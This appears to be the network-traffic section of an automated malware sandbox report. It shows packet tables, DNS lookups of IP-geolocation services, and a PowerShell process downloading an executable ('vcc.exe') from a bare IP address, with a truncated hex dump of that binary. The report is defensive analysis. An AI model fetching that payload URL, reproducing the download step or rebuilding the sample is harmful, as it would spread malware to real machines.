                                                                                  Mar 11, 2025 09:21:30.961286068 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961297989 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961309910 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961309910 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961325884 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961335897 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961344004 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961355925 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961374044 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961379051 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961383104 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961395979 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961424112 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961432934 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961445093 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961448908 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961456060 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961464882 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961477995 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961483955 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961487055 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961497068 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961507082 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961515903 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961529016 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961551905 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961564064 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961611986 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961622953 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961633921 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961643934 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961646080 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961657047 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961658001 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961678028 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961705923 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961716890 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961728096 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961729050 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961770058 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961839914 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961850882 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961858988 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961863041 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961874962 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961884975 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961886883 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961898088 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961918116 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961918116 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961946964 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.961958885 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961970091 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.961981058 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962003946 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962004900 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962024927 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962063074 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962074995 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962094069 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962105036 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962116957 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962126017 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962129116 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962136030 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962150097 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962179899 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962191105 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962203979 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962207079 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962219000 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962227106 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962230921 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962240934 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962259054 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962260962 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962280989 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962300062 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962312937 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962323904 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962408066 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962419033 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962429047 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962431908 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962447882 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962460041 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962466955 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962466955 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962471962 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962488890 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962491989 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962502956 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962515116 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962523937 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962529898 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962538004 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962541103 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962563038 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962567091 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962579012 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962589979 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962590933 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.962599039 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.962863922 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963104963 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963114977 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963128090 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963140011 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963154078 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963172913 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963187933 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963196993 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963196993 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963200092 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963212967 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963219881 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963258982 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963269949 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963280916 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963283062 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963299036 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963304043 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963315964 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963324070 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963390112 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963402033 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963413000 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963414907 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963430882 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963437080 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963443995 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963454008 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963454962 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963473082 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963475943 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963495016 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963526011 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963536978 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963547945 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963550091 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963565111 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963588953 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.963989019 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.963999987 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.964018106 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.964030981 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.964037895 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.964087009 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.964102983 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.964113951 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:30.964215040 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:30.964215040 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:31.006793022 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:31.006813049 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:31.006827116 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:31.006854057 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:31.007148027 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:35.172743082 CET804968723.95.235.28192.168.2.6
                                                                                  Mar 11, 2025 09:21:35.172853947 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:37.492302895 CET4968880192.168.2.6132.226.247.73
                                                                                  Mar 11, 2025 09:21:37.497184038 CET8049688132.226.247.73192.168.2.6
                                                                                  Mar 11, 2025 09:21:37.497294903 CET4968880192.168.2.6132.226.247.73
                                                                                  Mar 11, 2025 09:21:37.497594118 CET4968880192.168.2.6132.226.247.73
                                                                                  Mar 11, 2025 09:21:37.502444983 CET8049688132.226.247.73192.168.2.6
                                                                                  Mar 11, 2025 09:21:38.183032036 CET8049688132.226.247.73192.168.2.6
                                                                                  Mar 11, 2025 09:21:38.235635996 CET4968880192.168.2.6132.226.247.73
                                                                                  Mar 11, 2025 09:21:38.434036016 CET4968880192.168.2.6132.226.247.73
                                                                                  Mar 11, 2025 09:21:38.439002991 CET8049688132.226.247.73192.168.2.6
                                                                                  Mar 11, 2025 09:21:38.644768953 CET8049688132.226.247.73192.168.2.6
                                                                                  Mar 11, 2025 09:21:38.688714027 CET4968880192.168.2.6132.226.247.73
                                                                                  Mar 11, 2025 09:21:39.090255022 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:21:39.090315104 CET44349689104.21.80.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:39.090383053 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:21:39.143903971 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:21:39.143927097 CET44349689104.21.80.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:39.532170057 CET4968780192.168.2.623.95.235.28
                                                                                  Mar 11, 2025 09:21:41.138607025 CET44349689104.21.80.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:41.138740063 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:21:41.160063028 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:21:41.160096884 CET44349689104.21.80.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:41.160425901 CET44349689104.21.80.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:41.204336882 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:21:41.262350082 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:21:41.308326006 CET44349689104.21.80.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:41.738992929 CET44349689104.21.80.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:41.739068031 CET44349689104.21.80.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:41.739217997 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:21:41.786386967 CET49689443192.168.2.6104.21.80.1
                                                                                  Mar 11, 2025 09:22:43.644454002 CET8049688132.226.247.73192.168.2.6
                                                                                  Mar 11, 2025 09:22:43.644625902 CET4968880192.168.2.6132.226.247.73
                                                                                  Mar 11, 2025 09:23:18.689167023 CET4968880192.168.2.6132.226.247.73
                                                                                  Mar 11, 2025 09:23:18.694385052 CET8049688132.226.247.73192.168.2.6

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Mar 11, 2025 09:21:37.477853060 CET5583253192.168.2.61.1.1.1
                                                                                  Mar 11, 2025 09:21:37.485043049 CET53558321.1.1.1192.168.2.6
                                                                                  Mar 11, 2025 09:21:39.028975010 CET5949153192.168.2.61.1.1.1
                                                                                  Mar 11, 2025 09:21:39.046895981 CET53594911.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Mar 11, 2025 09:21:37.477853060 CET192.168.2.61.1.1.10x7949Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:39.028975010 CET192.168.2.61.1.1.10x3651Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Mar 11, 2025 09:21:37.485043049 CET1.1.1.1192.168.2.60x7949No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:37.485043049 CET1.1.1.1192.168.2.60x7949No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:37.485043049 CET1.1.1.1192.168.2.60x7949No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:37.485043049 CET1.1.1.1192.168.2.60x7949No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:37.485043049 CET1.1.1.1192.168.2.60x7949No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:37.485043049 CET1.1.1.1192.168.2.60x7949No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:39.046895981 CET1.1.1.1192.168.2.60x3651No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:39.046895981 CET1.1.1.1192.168.2.60x3651No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:39.046895981 CET1.1.1.1192.168.2.60x3651No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:39.046895981 CET1.1.1.1192.168.2.60x3651No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:39.046895981 CET1.1.1.1192.168.2.60x3651No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:39.046895981 CET1.1.1.1192.168.2.60x3651No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                  Mar 11, 2025 09:21:39.046895981 CET1.1.1.1192.168.2.60x3651No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • reallyfreegeoip.org
                                                                                  • 23.95.235.28
                                                                                  • checkip.dyndns.org

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.64968723.95.235.28805224C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 11, 2025 09:21:29.690857887 CET283OUTGET /560/vcc.exe HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: 23.95.235.28
                                                                                  Connection: Keep-Alive
                                                                                  Mar 11, 2025 09:21:30.179475069 CET1236INHTTP/1.1 200 OK
                                                                                  Date: Tue, 11 Mar 2025 08:21:30 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 10 Mar 2025 13:04:37 GMT
                                                                                  ETag: "eba00-62ffc9d4aa7e0"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 965120
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-msdownload
                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 e3 ce 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d8 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELg"}@0@@@L|px0q+pH@.text `.rdata@@.datatR@.rsrcx0p2@@.relocqrH@B
                                                                                  Mar 11, 2025 09:21:30.179497957 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: DALhYC,YY9hcCY8hiCYhnCYM,hsCYhxCYQh}CYSLQ
                                                                                  Mar 11, 2025 09:21:30.179512978 CET1236INData Raw: 00 7e 6a 8b 55 f4 8d 4b 14 8d 43 10 89 4d 08 89 45 0c 8b 38 0f b6 84 13 10 08 00 00 8b 09 89 4d e8 83 f8 10 0f 8f f4 a2 03 00 0f 84 cd a2 03 00 83 e8 08 74 5c 48 48 0f 84 86 a2 03 00 48 48 0f 84 37 a2 03 00 48 48 0f 84 cc a1 03 00 8b 7d f8 ff 45
                                                                                  Data Ascii: ~jUKCME8Mt\HHHH7HH}EEMUEM;S|[EMpWVE_^[]}}tWVE8t!EM9t9}ujWPVEUeSVW}3CEW](H
                                                                                  Mar 11, 2025 09:21:30.179523945 CET1236INData Raw: 3b c2 77 4c 0f 84 02 a0 03 00 83 f8 2b 0f 87 2b 01 00 00 0f 84 e7 9f 03 00 83 f8 06 0f 86 79 01 00 00 83 f8 0f 0f 84 a9 00 00 00 83 f8 07 0f 84 80 01 00 00 83 f8 20 0f 85 86 00 00 00 8b c7 c1 e8 10 50 0f b7 c7 50 53 56 e8 0f f9 ff ff eb 7d ba 02
                                                                                  Data Ascii: ;wL++y PPSV};w)7;vv83jWSV+KwIQI {Ih>WSPVH_^[]VX33J
                                                                                  Mar 11, 2025 09:21:30.179536104 CET1236INData Raw: 9d 03 00 83 be 9c 01 00 00 00 0f 85 18 9d 03 00 8d 45 cc 50 ff 33 ff 15 94 f6 48 00 8b 45 d4 8b 4d cc 2b c1 8b 55 d8 89 45 f4 8b 45 d0 2b d0 89 45 e8 8d 45 e4 50 ff 36 89 55 f0 89 4d e4 ff 15 70 f6 48 00 8b 7d e4 8b c7 0f af 45 f8 8b 75 e8 8b 4d
                                                                                  Data Ascii: EP3HEM+UEE+EEP6UMpH}EuM}fE}fEE}fEE}fft(Efu~E+;t'Ef`uE+
                                                                                  Mar 11, 2025 09:21:30.179549932 CET1236INData Raw: 8b 4d 08 8b ff 85 c0 74 1c 8b 10 39 0a 74 05 8b 40 04 eb f1 8b 4d 0c 01 4a 04 8b 00 8b 40 08 8b e5 5d c2 08 00 51 89 4d f4 c7 45 f8 01 00 00 00 ff 15 48 f1 48 00 89 45 fc b9 38 58 4c 00 8d 45 f4 50 e8 35 0f 00 00 8b 45 fc eb d3 55 8b ec 8b 4d 08
                                                                                  Data Ascii: Mt9t@MJ@]QMEHHE8XLEP5EUMtW}_]UQQSVW}EP7HElEpEPVpHME;tuc;xu[s5HsEE;|}t|;
                                                                                  Mar 11, 2025 09:21:30.179562092 CET1236INData Raw: 4c 00 e8 d2 0c 00 00 b9 0c 58 4c 00 e8 a9 0d 00 00 b9 f0 57 4c 00 e8 3a 31 00 00 a1 e0 57 4c 00 85 c0 0f 85 d3 98 03 00 5e c3 55 8b ec 83 ec 28 53 56 57 68 d0 01 00 00 e8 ca e5 01 00 59 85 c0 0f 84 41 02 00 00 8b c8 e8 2e e9 ff ff 8b f8 8b 0d 14
                                                                                  Data Ascii: LXLWL:1WL^U(SVWhYA.XL}M9WLEPXL}XL]8XLpuE @#E E@ZEE EE}
                                                                                  Mar 11, 2025 09:21:30.179574966 CET1236INData Raw: 84 2f 9c 03 00 48 48 0f 84 ae 9b 03 00 83 e8 05 0f 85 8f 9b 03 00 57 51 e8 a1 ee ff ff ff 37 ff 15 3c f6 48 00 8b 74 24 0c 83 7f 44 00 75 33 83 7f 64 00 75 38 83 7f 68 00 75 3d 83 7f 50 00 75 42 8b 44 24 14 3b 46 1c 74 44 50 8b cb e8 98 f7 ff ff
                                                                                  Data Ascii: /HHWQ7<Ht$Du3du8hu=PuBD$;FtDP3@_^[]3wDHwdHwh<HwP<HL$NUE(SV5XLW,~XLS]}
                                                                                  Mar 11, 2025 09:21:30.179586887 CET1236INData Raw: 00 85 c0 74 6a 8b c8 8b 40 08 a3 3c 58 4c 00 85 c9 74 0b 51 e8 3f 01 00 00 a1 3c 58 4c 00 85 c0 74 38 83 60 04 00 a1 3c 58 4c 00 8b 0d 40 58 4c 00 49 89 0d 40 58 4c 00 85 c9 75 b5 eb 9f a1 10 58 4c 00 8b 44 88 fc 8b 00 85 c0 74 16 ff 30 ff 15 3c
                                                                                  Data Ascii: tj@<XLtQ?<XLt8`<XL@XLI@XLuXLDt0<Hi%8XLqT@XLUQVW}3M97t>AdESt@A`t.W3$Ht3@[_^]3MF;ur3V~
                                                                                  Mar 11, 2025 09:21:30.179599047 CET1236INData Raw: 37 fe eb e3 32 c0 eb ed 55 8b ec 5d e9 2e 00 00 00 a1 c4 52 4c 00 85 c0 74 07 50 ff 15 3c f7 48 00 b9 f8 52 4c 00 e8 ae 22 00 00 b9 e8 52 4c 00 e8 a4 22 00 00 b9 d0 52 4c 00 e9 9a 22 00 00 55 8b ec 83 e4 f8 51 a1 ac 52 4c 00 53 56 8b 75 08 57 8b
                                                                                  Data Ascii: 72U].RLtP<HRL"RL"RL"UQRLSVuW};u^v_--HH--f;=$dL5uuWVH_^[]tHt#HvjVHXL.3jhj
                                                                                  Mar 11, 2025 09:21:30.184437037 CET1236INData Raw: 00 00 00 89 7d ec c7 45 f4 6c f9 48 00 89 4d f8 c7 45 d4 33 36 40 00 ff 15 24 f7 48 00 ff 35 c4 52 4c 00 66 a3 74 52 4c 00 ff 35 c0 52 4c 00 51 e8 0d f5 ff ff 5f 5e 8b e5 5d c3 55 8b ec b8 2c 00 02 00 e8 f9 dd 02 00 56 57 8d 4d d4 e8 16 3b 00 00
